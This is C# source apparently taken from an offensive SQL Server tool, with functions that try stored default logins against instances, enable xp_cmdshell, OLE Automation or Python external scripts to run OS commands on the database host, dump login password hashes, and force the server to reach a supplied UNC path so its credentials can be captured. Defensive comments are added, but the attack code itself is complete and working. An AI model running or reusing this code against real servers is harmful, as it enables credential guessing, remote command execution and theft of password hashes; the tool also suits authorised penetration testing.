/// <summary>
/// Tries every credential pair registered in <c>logins</c> for this instance name
/// against the instance and prints each pair that connects.
/// </summary>
/// <remarks>
/// A reported hit means the instance still accepts one of the listed logins; the fix on the
/// server side is to change or disable that login. Failed attempts made here appear as
/// login failures (error 18456) in the SQL Server error log when failed-login auditing is on.
/// NOTE(review): <c>logins.GetValues</c> is dereferenced without a null check and
/// <c>userpass[1]</c> assumes every entry contains a NUL separator - confirm both hold.
/// </remarks>
/// <returns>false when no entries exist for the instance name; otherwise true, whether or not any login succeeded.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        // The lookup key is the last non-empty piece of the instance string after splitting on '\' and ','.
        string[] separators = new string[] { @"\", @"," };
        string[] pieces = instance.Split(separators, StringSplitOptions.RemoveEmptyEntries);
        string dbInstance = pieces.LastOrDefault();

        string[] defaults = logins.GetValues(dbInstance);
        if (defaults.Length == 0)
        {
            return false;
        }

        foreach (string entry in defaults)
        {
            // NOTE(review): this echoes the raw "user NUL password" entry to the console for every attempt.
            Console.WriteLine(entry);

            string[] userpass = entry.Split('\0');
            Credentials creds = new Credentials(userpass[0], userpass[1]);
            conn.BuildConnectionString(creds);
            if (!conn.Connect())
            {
                continue;
            }
            Console.WriteLine("[+] {0} : {1}:{2}", instance, creds.GetUsername(), creds.GetPassword());
        }
    }
    return true;
}
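/// <summary>
/// Runs <paramref name="query"/> as an operating-system command on the SQL Server host through the
/// OLE Automation procedures, reads the output back from the file named by <c>fileName</c>,
/// prints it and then deletes that file.
/// </summary>
/// <remarks>
/// Does nothing unless <c>SQLSysadminCheck</c> passes. 'Show Advanced Options' and
/// 'Ole Automation Procedures' are switched on when their config_value is 0 and are switched
/// back off only when <c>restoreState</c> is set.
/// Defensive notes: every sp_configure change made here is recorded in the SQL Server error log
/// (message 15457), so a 0-to-1 change of 'Ole Automation Procedures' is a usable alert
/// condition; the option should stay disabled on servers that do not need it, and sysadmin
/// membership should be kept minimal because that check is the only gate in this method.
/// NOTE(review): if any <c>_Query</c> call throws, the restore step at the end is skipped and
/// the options stay enabled - consider try/finally.
/// </remarks>
/// <param name="query">Command line placed after <c>cmd.exe /c</c>; it is inserted into the T-SQL text as-is.</param>
internal void Query(string query)
{
    if (!SQLSysadminCheck.Query(instance, computerName, credentials))
    {
        Console.WriteLine("[-] User is not SysAdmin");
        return;
    }

    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return;
        }

        // Remember the original values so they can be restored afterwards.
        int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
        if (0 == sao_value)
        {
            Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
            _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
        }

        int xcs_value = (int)_Query(sql, @"sp_configure 'Ole Automation Procedures'", "config_value");
        if (0 == xcs_value)
        {
            Console.WriteLine("{0} : Ole Automation Procedures is disabled, enabling.", instance);
            _Query(sql, @"sp_configure 'Ole Automation Procedures',1;RECONFIGURE", string.Empty);
        }

        // Step 1: run the command with its output redirected into fileName on the server.
        StringBuilder sb = new StringBuilder();
        sb.Append(QUERY1_1);
        sb.Append(string.Format("EXEC Sp_oamethod @shell, \'run\' , null, \'cmd.exe /c \"{0} > {1}\"\'", query, fileName));
        Console.WriteLine(App.DELIMITER);
        Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));
        Console.WriteLine(App.DELIMITER);

        // Presumably gives the command time to finish writing the file - TODO confirm.
        System.Threading.Thread.Sleep(1000);

        // Step 2: read the file back and print the "output" column.
        sb.Clear();
        sb.Append(QUERY2_1);
        sb.Append(string.Format("EXEC Sp_oamethod @fso, \'opentextfile\' , @file Out, \'{0}\', 1", fileName));
        sb.Append(QUERY2_3);
        sb.Append(string.Format("EXEC sp_oamethod @o, \'opentextfile\', @f out, \'{0}\', 1", fileName));
        sb.Append(QUERY2_5);
        Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));

        // Step 3: delete the file.
        sb.Clear();
        sb.Append(QUERY3_1);
        sb.Append(string.Format("EXEC Sp_oamethod @Shell, \'run\' , null, \'cmd.exe /c \"del {0}\"\' , \'0\' , \'true\'", fileName));
        Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));

        // Restore in reverse order, and only what this call switched on.
        if (0 == xcs_value && restoreState)
        {
            _Query(sql, @"sp_configure 'Ole Automation Procedures',0;RECONFIGURE", string.Empty);
        }
        if (0 == sao_value && restoreState)
        {
            // The option name must sit on one line: inside a verbatim string a line break
            // becomes part of the name passed to sp_configure.
            _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
        }
    }
}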
/// <summary>
/// Calls DB_NAME() for every id from <c>start</c> to <c>end</c> (inclusive) and stores one
/// <c>Fuzz</c> record per returned row in <c>fuzzed</c>; the name is filled in only when the
/// server returned one.
/// </summary>
/// <returns>
/// false when the connection fails or a row raises anything other than
/// <see cref="ArgumentNullException"/>; otherwise true.
/// </returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        for (int databaseId = start; databaseId <= end; databaseId++)
        {
            string statement = string.Format(
                "SELECT \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],\n" +
                "\'{2}\' as [DatabaseId],\n" +
                "DB_NAME({2}) as [DatabaseName]",
                computerName, instance, databaseId
                );
#if DEBUG
            Console.WriteLine(statement);
#endif
            table = conn.Query(statement);
            foreach (DataRow row in table.AsEnumerable())
            {
                try
                {
                    Fuzz entry = new Fuzz
                    {
                        ComputerName = computerName,
                        Instance = instance,
                        DatabaseId = (string)row["DatabaseId"],
                    };

                    // DB_NAME() yields NULL for an id that maps to no database.
                    object name = row["DatabaseName"];
                    if (!(name is DBNull))
                    {
                        entry.DatabaseName = (string)name;
                    }
#if DEBUG
                    Misc.PrintStruct <Fuzz>(entry);
#endif
                    fuzzed.Add(entry);
                }
                catch (ArgumentNullException)
                {
                    continue;
                }
                catch (Exception ex)
                {
                    Console.WriteLine(ex.Message);
                    return false;
                }
            }
        }
    }
    return true;
}
/// <summary>
/// Records the rows returned by <c>QUERY1_1</c> through <c>_AddLink</c>, then starts a
/// <c>_Query</c> walk at depth 0 for every <c>srvname</c> returned by <c>QUERY2_1</c>.
/// </summary>
/// <remarks>
/// <c>sourceInstance</c> is set to the current instance before the walk begins.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }
#if DEBUG
        Console.WriteLine(QUERY1_1);
#endif
        foreach (DataRow localRow in conn.Query(QUERY1_1).AsEnumerable())
        {
            _AddLink(localRow);
        }
#if DEBUG
        Console.WriteLine(QUERY2_1);
#endif
        sourceInstance = instance;
        foreach (DataRow linkRow in conn.Query(QUERY2_1).AsEnumerable())
        {
            string linkedServer = (string)linkRow["srvname"];
#if DEBUG
            Console.WriteLine(linkedServer);
#endif
            _Query(conn, string.Empty, linkedServer, 0);
        }
    }
    return true;
}
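/// <summary>
/// Builds the server-link listing query (fixed ComputerName/Instance columns, <c>QUERY1_2</c>,
/// optional <c>linkNameFilter</c>) and stores the mapped rows in <c>serverLinks</c>.
/// </summary>
/// <remarks>
/// <c>computerName</c>, <c>instance</c> and the filter are placed into the statement text as-is.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    string query1_1 = string.Format(
        "SELECT \'{0}\' as [ComputerName],\n" +
        "\'{1}\' as [Instance],",
        computerName, instance
        );

    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return false;
        }

        StringBuilder sb = new StringBuilder();
        sb.Append(query1_1);
        sb.Append(QUERY1_2);
        if (!string.IsNullOrEmpty(linkNameFilter))
        {
            sb.Append(linkNameFilter);
        }
#if DEBUG
        Console.WriteLine(sb.ToString());
#endif
        // No unconditional console output here: callers print the results themselves,
        // and a stray line would end up mixed into them.
        serverLinks = sql.Query <ServerLink>(sb.ToString(), new ServerLink());
    }
    return true;
}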
/// <summary>
/// Lists stored procedures in <c>database</c>: switches to the database, selects the fixed
/// ComputerName/Instance/DatabaseName columns plus <c>QUERY1_2</c>, applies the optional
/// <c>procedureNameFilter</c> and stores the mapped rows in <c>procedures</c>.
/// </summary>
/// <remarks>
/// NOTE(review): <c>database</c> is placed inside <c>[...]</c> without escaping a closing bracket.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        StringBuilder statement = new StringBuilder();
        statement.Append(string.Format("use [{0}];\n" +
            "SELECT \'{1}\' as [ComputerName],\n" +
            "\'{2}\' as [Instance],\n" +
            "\'{3}\' as [DatabaseName],\n",
            database, computerName, instance, database));
        statement.Append(QUERY1_2);

        bool hasNameFilter = !string.IsNullOrEmpty(procedureNameFilter);
        if (hasNameFilter)
        {
            statement.Append(procedureNameFilter);
        }

        string text = statement.ToString();
#if DEBUG
        Console.WriteLine(text);
#endif
        procedures = conn.Query <Procedure>(text, new Procedure());
    }
    return true;
}
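/// <summary>
/// Switches to <c>database</c>, selects the fixed ComputerName/Instance columns plus
/// <c>QUERY1_2</c>, appends the auto-exec, procedure-name and keyword filters and stores the
/// mapped rows in <c>files</c>.
/// </summary>
/// <remarks>
/// The three filters are appended unconditionally; appending a null string to a
/// <see cref="StringBuilder"/> adds nothing.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return false;
        }

        // Argument order is database, computerName, instance: {0} belongs only in USE,
        // {1} is the computer name and {2} the instance. Reusing {0}/{1} for the two
        // columns would label every row with the database name as ComputerName and the
        // computer name as Instance.
        string query1_1 = string.Format(
            "USE [{0}];" +
            "SELECT \'{1}\' as [ComputerName]," +
            "\'{2}\' as [Instance],",
            database, computerName, instance);

        StringBuilder sb = new StringBuilder();
        sb.Append(query1_1);
        sb.Append(QUERY1_2);
        sb.Append(autoExecFilter);
        sb.Append(procedureNameFilter);
        sb.Append(keywordFilter);
#if DEBUG
        Console.WriteLine(sb.ToString());
#endif
        files = sql.Query <AssemblyFiles>(sb.ToString(), new AssemblyFiles());
    }
    return true;
}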
/// <summary>
/// Lists the tables of <c>database</c> from its INFORMATION_SCHEMA.TABLES view, with the
/// optional <c>tableFilter</c>, and stores the mapped rows in <c>tables</c>.
/// </summary>
/// <remarks>
/// NOTE(review): the USE statement takes <c>database</c> unbracketed while the FROM clause
/// brackets it; both receive the value as-is.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        StringBuilder statement = new StringBuilder();
        statement.AppendFormat("USE {0};\n", database);
        statement.AppendFormat("SELECT \'{0}\' as [ComputerName],\n", computerName);
        statement.AppendFormat("\'{0}\' as [Instance],", instance);
        statement.Append(QUERY1_3);
        statement.AppendFormat("FROM[{0}].[INFORMATION_SCHEMA].[TABLES]", database);
        if (!string.IsNullOrEmpty(tableFilter))
        {
            statement.Append(tableFilter);
        }
        statement.Append(QUERY1_5);

        string text = statement.ToString();
#if DEBUG
        Console.WriteLine(text);
#endif
        tables = conn.Query <Table>(text, new Table());
    }
    return true;
}
/// <summary>
/// Lists databases on the instance and stores the mapped rows in <c>databases</c>.
/// The statement is assembled from <c>query1_2</c>, <c>query1_3</c> (only when the major
/// version is above 10) and <c>query1_4</c>, followed by whichever filters are set.
/// </summary>
/// <remarks>
/// The major version comes from a separate <c>SQLServerInfo</c> lookup; when it cannot be
/// parsed the version stays 0 and <c>query1_3</c> is left out.
/// </remarks>
/// <returns>false when the connection or the server-info lookup fails; otherwise true.</returns>
internal override bool Query()
{
    string header = string.Format(
        "SELECT \'{0}\' as [ComputerName],\n" +
        "\'{1}\' as [Instance],",
        computerName, instance);
    int versionShort = 0;

    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        SQLServerInfo serverInfo = new SQLServerInfo(credentials);
        serverInfo.SetInstance(instance);
        if (!serverInfo.Query())
        {
            return false;
        }

        SQLServerInfo.Details details = serverInfo.GetResults();
        string majorPart = details.SQLServerMajorVersion.Split('.').First();
        int.TryParse(majorPart, out versionShort);

        StringBuilder statement = new StringBuilder();
        statement.Append(header);
        statement.Append(query1_2);
        if (versionShort > 10)
        {
            statement.Append(query1_3);
        }
        statement.Append(query1_4);

        // Filters are appended in a fixed order; unset ones are skipped.
        string[] filters = new string[] { databaseFilter, noDefaultsFilter, hasAccessFilter, sysAdminFilter };
        foreach (string filter in filters)
        {
            if (!string.IsNullOrEmpty(filter))
            {
                statement.Append(filter);
            }
        }

        string text = statement.ToString();
#if DEBUG
        Console.WriteLine(text);
#endif
        databases = conn.Query <Database>(text, new Database());
    }
    return true;
}
/// <summary>
/// Reads the full <c>sp_configure</c> listing into <c>configs</c>, switching
/// 'Show Advanced Options' on first when its config_value is 0.
/// </summary>
/// <remarks>
/// The option is switched back off only when this call enabled it and <c>restoreState</c> is
/// set. Each change is a server-wide configuration change and is recorded in the SQL Server
/// error log (message 15457).
/// NOTE(review): an exception between enabling and restoring leaves the option enabled.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        int advancedOptions = (int)_Query(conn, @"sp_configure 'Show Advanced Options'", "config_value");
        bool enabledHere = advancedOptions == 0;
        if (enabledHere)
        {
            _Query(conn, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
        }

        configs = conn.Query <Config>("sp_configure", new Config());

        if (enabledHere && restoreState)
        {
            _Query(conn, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
        }
    }
    return true;
}
/// <summary>
/// Executes <paramref name="query"/> on the SQL Server host through <c>master..xp_cmdshell</c>
/// and prints the returned "output" column between delimiter lines.
/// </summary>
/// <remarks>
/// Does nothing unless <c>SQLSysadminCheck</c> passes. 'Show Advanced Options' and 'xp_cmdshell'
/// are switched on when their config_value is 0 and switched back off only when
/// <c>restoreState</c> is set.
/// Defensive notes: every sp_configure change made here is recorded in the SQL Server error log
/// (message 15457), so an xp_cmdshell 0-to-1 transition is a practical alert condition. The
/// sysadmin check is the only gate, so keeping sysadmin membership minimal is the main
/// mitigation.
/// NOTE(review): if a <c>_Query</c> call throws, the restore steps are skipped and xp_cmdshell
/// stays enabled - consider try/finally.
/// </remarks>
/// <param name="query">Command text placed inside the quoted xp_cmdshell argument as-is.</param>
internal void Query(string query)
{
    if (!SQLSysadminCheck.Query(instance, computerName, credentials))
    {
        Console.WriteLine("[-] User is not SysAdmin");
        return;
    }

    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return;
        }

        // Keep the original value so only a setting changed here is restored later.
        int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
        if (0 == sao_value)
        {
            Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
            _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
        }
        else
        {
            Console.WriteLine("{0} : Show Advanced Options is enabled.", instance);
        }

        int xcs_value = (int)_Query(sql, @"sp_configure 'xp_cmdshell'", "config_value");
        if (0 == xcs_value)
        {
            Console.WriteLine("{0} : xp_cmdshell is disabled, enabling.", instance);
            _Query(sql, @"sp_configure 'xp_cmdshell',1;RECONFIGURE", string.Empty);
        }
        else
        {
            Console.WriteLine("{0} : xp_cmdshell is enabled.", instance);
        }

        Console.WriteLine(App.DELIMITER);
        Console.WriteLine((string)_Query(sql, string.Format("EXEC master..xp_cmdshell \'{0}\'", query), "output"));
        Console.WriteLine(App.DELIMITER);

        // Restore in reverse order of enabling.
        if (0 == xcs_value && restoreState)
        {
            Console.WriteLine("{0} : Disabling xp_cmdshell.", instance);
            _Query(sql, @"sp_configure 'xp_cmdshell',0;RECONFIGURE", string.Empty);
        }
        if (0 == sao_value && restoreState)
        {
            Console.WriteLine("{0} : Disabling Show Advanced Options.", instance);
            _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
        }
    }
}
/// <summary>
/// Runs <paramref name="query"/> and prints every column value of every row on its own line;
/// byte arrays are printed in <see cref="BitConverter"/> hex form.
/// </summary>
/// <remarks>
/// NOTE(review): a failed connection still returns true, unlike the sibling Query methods
/// that return false in that case - confirm callers expect this.
/// </remarks>
/// <param name="query">Statement text sent to the server unchanged.</param>
/// <returns>false only when reading the result raises an exception; otherwise true.</returns>
internal bool Query(string query)
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return true;
        }

        DataTable result = conn.Query(query);
        StringBuilder output = new StringBuilder();
        try
        {
            foreach (DataRow row in result.AsEnumerable())
            {
                foreach (object cell in row.ItemArray)
                {
                    try
                    {
                        byte[] raw = cell as byte[];
                        if (raw != null)
                        {
                            output.AppendFormat("{0}\n", BitConverter.ToString(raw));
                        }
                        else
                        {
                            output.AppendFormat("{0}\n", cell);
                        }
                    }
                    catch (Exception ex)
                    {
                        // A cell that cannot be formatted is reported and skipped.
                        Console.WriteLine(ex.Message);
                    }
                }
            }
            Console.WriteLine(output.ToString());
        }
        catch (ArgumentNullException)
        {
            Console.WriteLine("Empty Response");
            return false;
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.Message);
            return false;
        }
    }
    return true;
}
/// <summary>
/// Runs <c>QUERY1_1</c> and stores the mapped rows in <c>oleProviders</c>.
/// </summary>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);

        bool connected = conn.Connect();
        if (!connected)
        {
            return false;
        }

        OleProvider template = new OleProvider();
        oleProviders = conn.Query <OleProvider>(QUERY1_1, template);
    }
    return true;
}
/// <summary>
/// Lists permissions granted to database principals in <c>database</c> (joined to schemas and
/// objects), applies the optional permission-name, principal-name and permission-type filters
/// and stores the mapped rows in <c>databasePrivileges</c>.
/// </summary>
/// <remarks>
/// NOTE(review): <c>database</c> is inserted unbracketed in every position.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        string selectHead = string.Format(
            "USE {0};\n" +
            "SELECT \'{1}\' as [ComputerName],\n" +
            "\'{2}\' as [Instance],\n" +
            "\'{0}\' as [DatabaseName],",
            database, computerName, instance);
        string fromClause = string.Format(
            "FROM {0}.sys.database_principals rp \n" +
            "INNER JOIN {0}.sys.database_permissions pm \n" +
            "ON pm.grantee_principal_id = rp.principal_id \n" +
            "LEFT JOIN {0}.sys.schemas ss \n" +
            "ON pm.major_id = ss.schema_id \n" +
            "LEFT JOIN {0}.sys.objects obj \n" +
            "ON pm.[major_id] = obj.[object_id] WHERE 1 = 1",
            database);

        StringBuilder statement = new StringBuilder();
        statement.Append(selectHead);
        statement.Append(QUERY1_2);
        statement.Append(fromClause);

        // "WHERE 1 = 1" above lets each set filter be appended as an extra condition.
        string[] filters = new string[] { permissionNameFilter, principalNameFilter, permissionTypeFilter };
        foreach (string filter in filters)
        {
            if (!string.IsNullOrEmpty(filter))
            {
                statement.Append(filter);
            }
        }

        string text = statement.ToString();
#if DEBUG
        Console.WriteLine(text);
#endif
        databasePrivileges = conn.Query <DatabasePrivilege>(text, new DatabasePrivilege());
    }
    return true;
}
/// <summary>
/// Executes <paramref name="query"/> on the SQL Server host by wrapping it in a Python
/// <c>subprocess.Popen</c> call between the <c>QUERY1_1</c> and <c>QUERY1_3</c>/<c>QUERY1_4</c>
/// fragments, and prints the returned "output" column between delimiter lines.
/// </summary>
/// <remarks>
/// Does nothing unless <c>SQLSysadminCheck</c> passes. 'Show Advanced Options' and
/// 'external scripts enabled' are switched on when their config_value is 0 and switched back
/// off only when <c>restoreState</c> is set.
/// Defensive notes: every sp_configure change made here is recorded in the SQL Server error log
/// (message 15457); on servers that do not use external scripts, a 0-to-1 change of
/// 'external scripts enabled' is worth alerting on.
/// NOTE(review): if a <c>_Query</c> call throws, the restore steps are skipped and the option
/// stays enabled - consider try/finally.
/// </remarks>
/// <param name="query">Command text placed after <c>cmd.exe /c</c> inside the Python string as-is.</param>
internal void Query(string query)
{
    if (!SQLSysadminCheck.Query(instance, computerName, credentials))
    {
        Console.WriteLine("[-] User is not SysAdmin");
        return;
    }

    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return;
        }

        // Keep the original values so only settings changed here are restored later.
        int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
        if (0 == sao_value)
        {
            _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
        }

        int xcs_value = (int)_Query(sql, @"sp_configure 'external scripts enabled'", "config_value");
        if (0 == xcs_value)
        {
            _Query(sql, @"sp_configure 'external scripts enabled',1;RECONFIGURE", string.Empty);
        }

        StringBuilder sb = new StringBuilder();
        sb.Append(QUERY1_1);
        sb.Append(string.Format("p = subprocess.Popen(\"cmd.exe /c {0}\", stdout=subprocess.PIPE)\n", query));
        sb.Append(QUERY1_3);
        sb.Append(QUERY1_4);
#if DEBUG
        Console.WriteLine(sb.ToString());
#endif
        Console.WriteLine(App.DELIMITER);
        Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
        Console.WriteLine(App.DELIMITER);

        // Restore in reverse order of enabling.
        if (0 == xcs_value && restoreState)
        {
            _Query(sql, @"sp_configure 'external scripts enabled',0;RECONFIGURE", string.Empty);
        }
        if (0 == sao_value && restoreState)
        {
            _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
        }
    }
}
/// <summary>
/// Reports whether the login described by <paramref name="credentials"/> is a member of the
/// sysadmin server role on <paramref name="instance"/>, using IS_SRVROLEMEMBER.
/// </summary>
/// <param name="instance">Instance to connect to; also echoed into the result row.</param>
/// <param name="computerName">Echoed into the result row only.</param>
/// <param name="credentials">Credentials used to build the connection string.</param>
/// <returns>
/// true when the first result row has IsSysadmin equal to "Yes"; false when the connection
/// fails, no row is returned, reading the row throws, or the value is anything else.
/// </returns>
internal static bool Query(string instance, string computerName, Credentials credentials)
{
    string statement = string.Format(
        "SELECT \'{0}\' as [ComputerName],\n" +
        "\'{1}\' as [Instance],\n" +
        "CASE\n" +
        "WHEN IS_SRVROLEMEMBER(\'sysadmin\') = 0 THEN \'No\'\n" +
        "ELSE \'Yes\'\n" +
        "END as IsSysadmin"
        , computerName, instance
        );

    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        DataTable result = conn.Query(statement);
        try
        {
            // Only the first row is ever inspected.
            foreach (DataRow row in result.AsEnumerable())
            {
#if DEBUG
                Console.WriteLine("{0}\t{1}\t{2}", row["Instance"].ToString(), row["Instance"].ToString(), row["IsSysadmin"].ToString());
#endif
                string answer = row["IsSysadmin"].ToString();
                return "Yes" == answer;
            }
        }
        catch (ArgumentNullException)
        {
            Console.WriteLine("Empty Response");
            return false;
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.Message);
            return false;
        }
        return false;
    }
}
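/// <summary>
/// Audits IMPERSONATE grants: runs the base privilege query filtered to "IMPERSONATE", then
/// checks each granted target login with IS_SRVROLEMEMBER('sysadmin', ...) and adds a finding
/// to <c>impersonates</c> for every target that is a sysadmin.
/// </summary>
/// <remarks>
/// Each finding carries its own remediation text (revoke the grant or use signed procedures).
/// NOTE(review): the connection is created with the parameterless <c>SQLConnection()</c>
/// constructor while sibling methods pass <c>instance</c> - confirm which instance it targets.
/// NOTE(review): <c>j.ObjectName</c> comes from server results and is placed inside a quoted
/// literal as-is; a name containing a single quote would break the statement.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    SQLServerInfo i = new SQLServerInfo(credentials);
    i.SetInstance(instance);
    i.Query();
    var info = i.GetResults();

    SetPermissionNameFilter("IMPERSONATE");
    base.Query();

    using (SQLConnection sql = new SQLConnection())
    {
        sql.BuildConnectionString(credentials);
        // Stop here on a failed connection instead of querying through it.
        if (!sql.Connect())
        {
            return false;
        }

        foreach (var j in serverPrivileges)
        {
            string query = string.Format("SELECT IS_SRVROLEMEMBER(\'sysadmin\', \'{0}\') as Status", j.ObjectName);
            foreach (var r in sql.Query(query).AsEnumerable())
            {
                // IS_SRVROLEMEMBER returns NULL for an invalid login or role; only 1 means member.
                if (!(r["Status"] is DBNull) && 1 == (int)r["Status"])
                {
                    var s = new Impersonate
                    {
                        ComputerName = computerName,
                        Instance = instance,
                        Vulnerability = "Excessive Privilege - Impersonate Login",
                        Description = "The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges.",
                        Remediation = "Consider using an alternative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]",
                        Severity = "High",
                        IsVulnerable = "Yes",
                        IsExploitable = "Unknown",
                        Exploited = "No",
                        ExploitCmd = "",
                        Reference = @"https://msdn.microsoft.com/en-us/library/ms181362.aspx",
                        Details = string.Format("{0} can impersonate the {1} SYSADMIN login. This test was run with the {2} login.", j.GranteeName, j.ObjectName, info.Currentlogin)
                    };
                    impersonates.Add(s);
                }
            }
        }
    }
    return true;
}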
/// <summary>
/// Populates <c>hashes</c> from <c>QUERY1_1</c> (major version above 8) or <c>QUERY2_1</c>
/// (otherwise); the query text itself is defined elsewhere.
/// </summary>
/// <remarks>
/// Requires a successful connection, a passing sysadmin check and a parseable major version.
/// NOTE(review): every path returns false, including the one that fills <c>hashes</c> -
/// confirm what callers expect.
/// </remarks>
/// <returns>Always false in the code as written.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        bool isSysadmin = SQLSysadminCheck.Query(instance, computerName, credentials);
        if (!isSysadmin)
        {
            Console.WriteLine("[-] User is not Sysadmin");
            return false;
        }

        SQLServerInfo serverInfo = new SQLServerInfo(credentials);
        serverInfo.SetInstance(instance);
        serverInfo.Query();
        SQLServerInfo.Details details = serverInfo.GetResults();

        int versionShort;
        string majorPart = details.SQLServerMajorVersion.Split('.').First();
        if (!int.TryParse(majorPart, out versionShort))
        {
            Console.WriteLine("[-] Unable to ascertain SQL Version");
            Console.WriteLine("[*] It is possible to override this with the --version flag");
            return false;
        }

        string statement = versionShort > 8 ? QUERY1_1 : QUERY2_1;
        hashes = conn.Query <Hash>(statement, new Hash());
    }
    return false;
}
/// <summary>
/// Makes the server access <c>uncpath</c> twice: with xp_dirtree and xp_fileexist when the
/// major version is 11 or higher, or with BACKUP LOG / BACKUP DATABASE to that path otherwise.
/// </summary>
/// <remarks>
/// Defensive notes: when the path is a remote share, the server process is the one that opens
/// it, so outbound SMB from database servers should be blocked at the network edge, and
/// execute rights on xp_dirtree and xp_fileexist should not be left with low-privileged logins.
/// NOTE(review): a failed connection still returns true.
/// </remarks>
/// <returns>false only when the major version cannot be parsed; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return true;
        }

        SQLServerInfo serverInfo = new SQLServerInfo(credentials);
        serverInfo.SetInstance(instance);
        serverInfo.Query();
        SQLServerInfo.Details details = serverInfo.GetResults();

        int versionShort;
        string majorPart = details.SQLServerMajorVersion.Split('.').First();
        if (!int.TryParse(majorPart, out versionShort))
        {
            Console.WriteLine("[-] Unable to ascertain SQL Version");
            Console.WriteLine("[*] It is possible to override this with the --version flag");
            return false;
        }

        string first;
        string second;
        if (versionShort >= 11)
        {
            first = string.Format("xp_dirtree \'{0}\'", uncpath);
            second = string.Format("xp_fileexist \'{0}\'", uncpath);
        }
        else
        {
            first = string.Format("BACKUP LOG [TESTING] TO DISK = \'{0}\'", uncpath);
            second = string.Format("BACKUP DATABASE [TESTING] TO DISK = \'{0}\'", uncpath);
        }

        _Query(conn, first);
        _Query(conn, second);
    }
    return true;
}
/// <summary>
/// Lists database audit specifications: fixed ComputerName/Instance columns plus
/// <c>QUERY1_2</c>, with the optional audit-name, specification and action-name filters,
/// stored in <c>databaseSpecifications</c>.
/// </summary>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    string header = string.Format(
        "SELECT \'{0}\' as [ComputerName],\n" +
        "\'{1}\' as [Instance],",
        computerName, instance
        );

    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        StringBuilder statement = new StringBuilder();
        statement.Append(header);
        statement.Append(QUERY1_2);

        // Filters are appended in a fixed order; unset ones are skipped.
